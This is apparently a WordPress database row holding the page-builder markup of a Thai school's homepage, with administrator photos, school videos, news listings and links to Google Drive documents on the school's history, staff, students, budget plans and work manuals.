(439,2,'2024-09-24 11:50:55','2024-09-24 04:50:55','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0f4859-9f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0f4859-9f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/i-C4sNY7Mf8?si=HVfhH_a_V4qo3m9e\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/i-C4sNY7Mf8?si=HVfhH_a_V4qo3m9e\n</div></figure>\n<!-- /wp:embed --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" 